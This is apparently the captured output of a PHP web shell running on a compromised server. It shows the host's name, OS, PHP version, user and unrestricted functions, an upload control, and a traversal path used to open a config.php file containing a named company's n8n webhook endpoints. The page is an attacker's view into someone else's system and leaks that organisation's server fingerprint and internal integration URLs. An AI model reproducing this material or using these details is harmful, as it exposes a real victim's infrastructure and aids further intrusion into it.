( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/../tmpr/..//tmpr/../tmpr/../tmpr/../tmpr/..//n8n/config.php
<?php
// Configure your n8n instance URL and form path here.
// Example for local n8n: http://localhost:5678
// Example for hosted n8n: https://n8n.yourdomain.com

define('N8N_BASE_URL', 'https://thebrandai.app.n8n.cloud');
// This should match the Form Trigger path in your n8n workflow (ProposalX.json)
define('N8N_FORM_PATH', 'deep_proposal');

// Non-iframe integration endpoints (create these webhooks in n8n)
// POST -> returns { questions: [] }
define('N8N_QUESTIONS_URL', 'https://thebrandai.app.n8n.cloud/webhook/proposalx/questions');
// POST -> returns { requestId, notionUrl }
define('N8N_SUBMIT_URL', 'https://thebrandai.app.n8n.cloud/webhook/proposalx/submit');